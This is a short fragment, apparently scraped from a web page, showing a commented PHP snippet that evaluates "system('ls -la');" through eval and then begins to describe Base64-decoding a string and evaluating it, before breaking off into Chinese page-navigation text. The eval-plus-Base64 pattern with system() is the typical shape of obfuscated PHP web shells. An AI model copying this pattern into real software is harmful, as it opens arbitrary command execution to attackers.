<?php // Evaluates the string "system('ls -la');" as PHP code eval("system('ls -la');"); // Decodes the Base64 encoded string and evaluates ...
確定! 回上一頁